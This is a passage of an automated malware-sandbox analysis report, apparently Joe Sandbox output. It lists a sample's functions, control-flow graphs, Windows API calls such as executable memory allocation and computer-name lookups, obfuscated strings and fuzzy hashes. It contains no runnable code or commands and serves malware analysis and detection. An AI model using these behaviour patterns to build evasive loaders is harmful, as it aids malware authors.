3b9c9b-3b9c9e 267->273 268->267 268->268 269->266 269->269 273->224
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID:
                    • String ID: %I8O$&QaW$)M:S$*E0K$,Y+_$0$1A;G$<U%[$E-^3$J9S?$X)\/$b5K;$c%U+$m]8c
                    • API String ID: 0-997815367
                    • Opcode ID: ab62a5a0ddb8e176dc3a0db865cf8f9073b55528b7d77779d736779f00cafe9c
                    • Instruction ID: 36261d4fe83dd217269e58ed13e91cbd1cc3c0a8ccd772219741dd4e5f9e2dc9
                    • Opcode Fuzzy Hash: ab62a5a0ddb8e176dc3a0db865cf8f9073b55528b7d77779d736779f00cafe9c
                    • Instruction Fuzzy Hash: 3F0213B02183818BE325CF14C4A4BAFBBE5BBC2348F144D1DE6D58B692D779D509CB92
                    Function 003E24B2 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 149nativememoryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 387 3e24b2-3e24ba 388 3e25bf-3e25d1 387->388 389 3e24c0-3e24ca 387->389 391 3e25d4-3e268b NtAllocateVirtualMemory NtFreeVirtualMemory 388->391 390 3e24d0-3e24d7 389->390 392 3e24ec-3e2599 NtAllocateVirtualMemory NtFreeVirtualMemory 390->392 393 3e24d9-3e24dd 390->393 392->388 395 3e259b-3e25a3 392->395 393->390 394 3e24df-3e24e1 393->394 394->395 396 3e24e7 394->396 399 3e25b0-3e25b7 395->399 396->388 399->391 400 3e25b9-3e25bd 399->400 400->388 400->399
                    APIs
                    • NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,00000010,00003000,00000040), ref: 003E2543
                    • NtFreeVirtualMemory.NTDLL(000000FF,?,00000000,00008000), ref: 003E258B
                    • NtAllocateVirtualMemory.NTDLL(000000FF,00000000,00000000,00000010,00003000,00000040), ref: 003E262B
                    • NtFreeVirtualMemory.NTDLL(000000FF,00000000,00000000,00008000), ref: 003E2673
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID: MemoryVirtual$AllocateFree
                    • String ID: 4JC
                    • API String ID: 292159236-962601979
                    • Opcode ID: a81bf9ddf7986d120f71c31fae18e1c522ff789632074fe019961e8af1ab8fac
                    • Instruction ID: b7d4a7f1509e7ade4a2ae972bf8da00945e28c11de24573b02e4633c1f61ebe5
                    • Opcode Fuzzy Hash: a81bf9ddf7986d120f71c31fae18e1c522ff789632074fe019961e8af1ab8fac
                    • Instruction Fuzzy Hash: 43512471200B018FD736CF15C855B27B7E8AB08318F148B1CE9A68BAE0D7B4E949CB94
                    Function 003D12E2 Relevance: 7.6, APIs: 2, Strings: 2, Instructions: 562COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 401 3d12e2-3d12ea 402 3d12ec-3d12f2 call 3b8560 401->402 403 3d12f5-3d139f call 3e4a60 401->403 402->403 409 3d13f8-3d1401 403->409 410 3d13a1 403->410 412 3d141b-3d1427 409->412 413 3d1403-3d1409 409->413 411 3d13b0-3d13f6 410->411 411->409 411->411 415 3d1429-3d142f 412->415 416 3d143b-3d14d3 call 3b85d0 call 3e4a60 412->416 414 3d1410-3d1419 413->414 414->412 414->414 417 3d1430-3d1439 415->417 423 3d14d5 416->423 424 3d1527-3d1530 416->424 417->416 417->417 425 3d14e0-3d1525 423->425 426 3d154b-3d1557 424->426 427 3d1532-3d1538 424->427 425->424 425->425 429 3d1559-3d155f 426->429 430 3d156b-3d15e4 call 3e4a60 GetComputerNameExA 426->430 428 3d1540-3d1549 427->428 428->426 428->428 431 3d1560-3d1569 429->431 434 3d162e-3d1637 430->434 435 3d15e6 430->435 431->430 431->431 437 3d1639-3d163f 434->437 438 3d164b-3d1657 434->438 436 3d15f0-3d162c 435->436 436->434 436->436 439 3d1640-3d1649 437->439 440 3d1659-3d165f 438->440 441 3d166b-3d16c5 GetComputerNameExA 438->441 439->438 439->439 442 3d1660-3d1669 440->442 443 3d1729-3d1732 441->443 444 3d16c7 441->444 442->441 442->442 446 3d174b-3d1757 443->446 447 3d1734-3d173a 443->447 445 3d16d0-3d1727 444->445 445->443 445->445 449 3d1759-3d175f 446->449 450 3d176b-3d17ea 446->450 448 3d1740-3d1749 447->448 448->446 448->448 451 3d1760-3d1769 449->451 453 3d17ec-3d17ef 450->453 454 3d182e-3d1837 450->454 451->450 451->451 455 3d17f0-3d182c 453->455 456 3d1839-3d183f 454->456 457 3d184b-3d1857 454->457 455->454 455->455 458 3d1840-3d1849 456->458 459 3d1859-3d185f 457->459 460 3d186b-3d18ce call 3e4a60 457->460 458->457 458->458 461 3d1860-3d1869 459->461 465 3d1918-3d1921 460->465 466 3d18d0-3d1916 460->466 461->460 461->461 467 3d193b-3d1940 465->467 468 3d1923-3d1929 465->468 466->465 466->466 470 3d1966-3d1972 467->470 469 3d1930-3d1939 468->469 469->467 469->469 471 3d1a0e-3d1a10 470->471 472 3d1978-3d197c 470->472 473 3d1a14-3d1a6c 471->473 474 3d197e-3d199e 472->474 475 3d1950-3d1952 472->475 476 3d1a6e-3d1a6f 473->476 477 3d1ac2-3d1acb 473->477 479 3d19d0-3d19db 474->479 480 3d19a0-3d19a3 474->480 478 3d1957-3d1960 475->478 481 3d1a70-3d1ac0 476->481 482 3d1acd-3d1ad3 477->482 483 3d1aeb-3d1aee call 3d72c0 477->483 478->470 484 3d1a12 478->484 479->478 486 3d19e1-3d1a09 479->486 480->479 485 3d19a5-3d19c0 480->485 481->477 481->481 487 3d1ae0-3d1ae9 482->487 489 3d1af3-3d1b13 483->489 484->473 485->478 486->478 487->483 487->487
                    APIs
                    • GetComputerNameExA.KERNELBASE(00000006,?,00000200), ref: 003D159D
                    • GetComputerNameExA.KERNELBASE(00000005,00000000,00000200), ref: 003D1688
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID: ComputerName
                    • String ID: Tzrp$p}w/
                    • API String ID: 3545744682-1275741564
                    • Opcode ID: e76caf1e3c401536e06bada80da9fa74236a3d99a74fa8b4e4adc63e153024f5
                    • Instruction ID: d0be67e0ac3feba43744d30526e022b59620b99c8f69716767fdbf0b94e61988
                    • Opcode Fuzzy Hash: e76caf1e3c401536e06bada80da9fa74236a3d99a74fa8b4e4adc63e153024f5
                    • Instruction Fuzzy Hash: A6226C71104B808BE726CB39D494BE3BBE1BB16304F48899DD4FB8B287DB796509CB51
                    Function 003C9080 Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 333nativememoryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 490 3c9080-3c9090 491 3c9096-3c90d2 490->491 492 3c9140 490->492 493 3c90d4 491->493 494 3c9113-3c911f 491->494 495 3c9142-3c914b 492->495 496 3c90e0-3c9111 493->496 497 3c9120-3c912c 494->497 496->494 496->496 498 3c912e-3c9134 497->498 499 3c9136-3c9139 497->499 498->497 498->499 499->492 500 3c913b-3c913e 499->500 500->492 501 3c914c-3c9151 500->501 502 3c9160-3c9169 501->502 502->502 503 3c916b-3c9176 502->503 504 3c9180-3c9189 503->504 504->504 505 3c918b-3c9196 504->505 506 3c919f 505->506 507 3c9198-3c919d 505->507 508 3c91a1-3c91b4 call 3b8550 506->508 507->508 511 3c91b6-3c91bf 508->511 512 3c91d1-3c91df 508->512 513 3c91c0-3c91cf 511->513 514 3c9201-3c9224 call 3e5440 512->514 515 3c91e1-3c91e4 512->515 513->512 513->513 519 3c9278-3c927a 514->519 520 3c9226-3c9248 call 3b8550 call 3e5940 514->520 516 3c91f0-3c91ff 515->516 516->514 516->516 522 3c93f8-3c9404 call 3b8560 519->522 528 3c927f-3c9281 520->528 529 3c924a-3c9258 520->529 522->495 531 3c930d-3c9315 528->531 530 3c9260-3c9269 529->530 530->530 532 3c926b-3c926f 530->532 531->522 533 3c931b-3c9327 531->533 534 3c9286 532->534 535 3c9271-3c9276 532->535 536 3c9330-3c9337 533->536 537 3c9288-3c9299 call 3b8550 534->537 535->537 538 3c9339-3c933d 536->538 539 3c9344-3c93d1 NtAllocateVirtualMemory 536->539 544 3c929b-3c929e 537->544 545 3c92b1-3c92bf 537->545 538->536 541 3c933f 538->541 542 3c93d9-3c93f2 NtFreeVirtualMemory 539->542 541->522 542->522 548 3c92a0-3c92af 544->548 546 3c92e1-3c930a call 3b8c90 call 3b8560 * 2 545->546 547 3c92c1-3c92c4 545->547 546->531 549 3c92d0-3c92df 547->549 548->545 548->548 549->546 549->549
                    APIs
                    • NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,00000010,00003000,00000040), ref: 003C93A9
                    • NtFreeVirtualMemory.NTDLL(000000FF,?,00000000,00008000), ref: 003C93F2
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID: MemoryVirtual$AllocateFree
                    • String ID: >!$z9I;
                    • API String ID: 292159236-571071913
                    • Opcode ID: 15531b3e008800ee7f8ba7fd0adf239151943d3d0270fd6326a470d3fb1e3aa7
                    • Instruction ID: 1ba0fa01f7ddef9888346e4baf0e18f45629d89014fabb0d28e08881ae72fa7b
                    • Opcode Fuzzy Hash: 15531b3e008800ee7f8ba7fd0adf239151943d3d0270fd6326a470d3fb1e3aa7
                    • Instruction Fuzzy Hash: D391EFB15083159BD722DF14CC4ABABB7E4EF85324F0A491DE8919B391E374DD04C7A2
                    Function 003E5440 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146nativememoryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 556 3e5440-3e544b 557 3e5450-3e5459 556->557 557->557 558 3e545b-3e5462 557->558 559 3e546b 558->559 560 3e5464-3e5469 558->560 561 3e546e-3e549b call 3b8550 559->561 560->561 564 3e549d 561->564 565 3e54b2-3e552d 561->565 566 3e54a0-3e54b0 564->566 567 3e562d-3e563f call 3b8560 565->567 568 3e5533-3e553b 565->568 566->565 566->566 569 3e5540-3e5547 568->569 571 3e5549-3e554d 569->571 572 3e5554-3e5627 NtAllocateVirtualMemory NtFreeVirtualMemory 569->572 571->569 574 3e554f 571->574 572->567 574->567
                    APIs
                    • NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,00000010,00003000,00000040), ref: 003E55B5
                    • NtFreeVirtualMemory.NTDLL(000000FF,?,00000000,00008000), ref: 003E5627
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID: MemoryVirtual$AllocateFree
                    • String ID: ,$@
                    • API String ID: 292159236-1227015840
                    • Opcode ID: a68bf346d6ffccd128e67b11b09f01effac4bc8d607d5d72fbbc3a5701115439
                    • Instruction ID: 860fd79a3e48a2a92c9534ec92191946ad0b19bd9e0b26db91dc1e139878d610
                    • Opcode Fuzzy Hash: a68bf346d6ffccd128e67b11b09f01effac4bc8d607d5d72fbbc3a5701115439
                    • Instruction Fuzzy Hash: 8C519CB11097009FD711CF14CC45B6BBBE9EF84318F158A1DF5A98B2E0E7B59A48CB92
                    Function 003CD860 Relevance: 6.4, APIs: 4, Instructions: 377nativememoryCOMMON
                    Download Yara Rule
                    APIs
                    • NtAllocateVirtualMemory.NTDLL(000000FF,00000000,00000000,00000010,00003000,00000040), ref: 003CD90B
                    • NtFreeVirtualMemory.NTDLL(000000FF,00000000,00000000,00008000), ref: 003CD962
                    • NtAllocateVirtualMemory.NTDLL(000000FF,00000000,00000000,00000010,00003000,00000040), ref: 003CDA21
                    • NtFreeVirtualMemory.NTDLL(000000FF,?,00000010,00008000), ref: 003CDA74
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID: MemoryVirtual$AllocateFree
                    • String ID:
                    • API String ID: 292159236-0
                    • Opcode ID: 9de6c55bcfddab35f7d795a2de90e5ddc7fce5bb78049d94642ba6b61696d8e2
                    • Instruction ID: 98c3b2bccd789b7273e29f7c5b711aef8360d3bca8823b8487c6e90e00c7ad15
                    • Opcode Fuzzy Hash: 9de6c55bcfddab35f7d795a2de90e5ddc7fce5bb78049d94642ba6b61696d8e2
                    • Instruction Fuzzy Hash: 5FD1CAB1A083118FE711CF18C881B6BBBE5EB85354F15892DF5999B390E7B4DD08CB92
                    Function 003E6060 Relevance: 6.3, APIs: 4, Instructions: 293nativememoryCOMMON
                    Download Yara Rule
                    APIs
                    • NtAllocateVirtualMemory.NTDLL(000000FF,00000000,00000000,00000010,00003000,00000040), ref: 003E6108
                    • NtFreeVirtualMemory.NTDLL(000000FF,00000000,00000000,00008000), ref: 003E6165
                    • NtAllocateVirtualMemory.NTDLL(000000FF,D2FF0000,00000000,?,00003000,00000040), ref: 003E6226
                    • NtFreeVirtualMemory.NTDLL(000000FF,D2FF0000,00000010,00008000), ref: 003E627F
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID: MemoryVirtual$AllocateFree
                    • String ID:
                    • API String ID: 292159236-0
                    • Opcode ID: 825704c8399414a5f776b1ae9957733ed8b8e987a4d511a6c43e8d43213bd58b
                    • Instruction ID: 7cbd5c86a61b3c35b51e2e937ea71d98edc4d5b865b11d5c9cb86dd5478ae8aa
                    • Opcode Fuzzy Hash: 825704c8399414a5f776b1ae9957733ed8b8e987a4d511a6c43e8d43213bd58b
                    • Instruction Fuzzy Hash: 45B176752083659FD715CF19C881B2EB7E9FF98394F058A2CE9948B3A0D774E904CB92
                    Function 003E67D0 Relevance: 6.3, APIs: 4, Instructions: 268nativememoryCOMMON
                    Download Yara Rule
                    APIs
                    • NtAllocateVirtualMemory.NTDLL(000000FF,00000000,00000000,00000010,00003000,00000040), ref: 003E68C8
                    • NtFreeVirtualMemory.NTDLL(000000FF,00000000,00000000,00008000), ref: 003E6926
                    • NtAllocateVirtualMemory.NTDLL(000000FF,900000C2,00000000,?,00003000,00000040), ref: 003E69EB
                    • NtFreeVirtualMemory.NTDLL(000000FF,900000C2,00000010,00008000), ref: 003E6A45
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID: MemoryVirtual$AllocateFree
                    • String ID:
                    • API String ID: 292159236-0
                    • Opcode ID: f4791245cda22a2404188a24dd57c4c435f83bbaa25debbf06d8bdaff8863823
                    • Instruction ID: ae28c8e916eaa13243bbae75671cd41d41c5a758913f26c4ed85bfe4d2f6c139
                    • Opcode Fuzzy Hash: f4791245cda22a2404188a24dd57c4c435f83bbaa25debbf06d8bdaff8863823
                    • Instruction Fuzzy Hash: 3C91ACB16093249FC315CF19C841B2BB7E9EB84358F058A2CF9A99B3D0D7B49D05CB92
                    Function 003E5D40 Relevance: 6.3, APIs: 4, Instructions: 255nativememoryCOMMON
                    Download Yara Rule
                    APIs
                    • NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,00000010,00003000,00000040), ref: 003E5DE5
                    • NtFreeVirtualMemory.NTDLL(000000FF,?,00000000,00008000), ref: 003E5E43
                    • NtAllocateVirtualMemory.NTDLL(000000FF,D2FF0000,00000000,?,00003000,00000040), ref: 003E5F0A
                    • NtFreeVirtualMemory.NTDLL(000000FF,000000B8,00000000,00008000), ref: 003E5F67
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID: MemoryVirtual$AllocateFree
                    • String ID:
                    • API String ID: 292159236-0
                    • Opcode ID: cf6a51b9326befc9d1ad89021c1a1aa83d25588a81e67d02d266f7f2b7da6c19
                    • Instruction ID: 10c82c00781761f0503a62e5f4bfc6bafc8aad4a6e24ea566729e9caddd9113e
                    • Opcode Fuzzy Hash: cf6a51b9326befc9d1ad89021c1a1aa83d25588a81e67d02d266f7f2b7da6c19
                    • Instruction Fuzzy Hash: 7A918A712083619BD711CF19C880B2BB7E9EB88394F158A2CF9949B3E0D7B5D945CB92
                    Function 003E0F80 Relevance: 6.2, APIs: 4, Instructions: 216nativememoryCOMMON
                    Download Yara Rule
                    APIs
                    • NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,00000010,00003000,00000040), ref: 003E1029
                    • NtFreeVirtualMemory.NTDLL(000000FF,?,00000000,00008000), ref: 003E1077
                    • NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00003000,00000040), ref: 003E1142
                    • NtFreeVirtualMemory.NTDLL(000000FF,0000BA00,00000010,00008000), ref: 003E1192
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID: MemoryVirtual$AllocateFree
                    • String ID:
                    • API String ID: 292159236-0
                    • Opcode ID: 48e356700c1e866b0b24ce731246b0f0a3c37f65398a61e0dcf65c5565bd2605
                    • Instruction ID: 6eacea1c1944d8a5c469f1856f83404654b313fb2c95acf0439e440aa9d8732f
                    • Opcode Fuzzy Hash: 48e356700c1e866b0b24ce731246b0f0a3c37f65398a61e0dcf65c5565bd2605
                    • Instruction Fuzzy Hash: 196189B16083519FE311CF19CC40B2BB7E9EB88714F158A2DEAA49B3D0D7B09945CB96
                    Function 003E2987 Relevance: 6.2, APIs: 4, Instructions: 157nativememoryCOMMON
                    Download Yara Rule
                    APIs
                    • NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,00000010,00003000,00000040), ref: 003E2ACD
                    • NtFreeVirtualMemory.NTDLL(000000FF,?,00000000,00008000), ref: 003E2B1C
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID: MemoryVirtual$AllocateFree
                    • String ID:
                    • API String ID: 292159236-0
                    • Opcode ID: 2e240177f778a76fa40dbc9c1dfe314c3cdbb56ecc3906b3ff3c9fe7b9e3e1a9
                    • Instruction ID: 01e3c999f0bcb6a7590dc593be1b510ab3ca3fec9e68a75bbdf8f1c6968e2899
                    • Opcode Fuzzy Hash: 2e240177f778a76fa40dbc9c1dfe314c3cdbb56ecc3906b3ff3c9fe7b9e3e1a9
                    • Instruction Fuzzy Hash: 97512471101B109FE325CF15C895B27B7F8BB08314F158B1CE5A68BAE0D7B5A949CBA0
                    Function 003B4640 Relevance: 5.5, Strings: 4, Instructions: 490COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
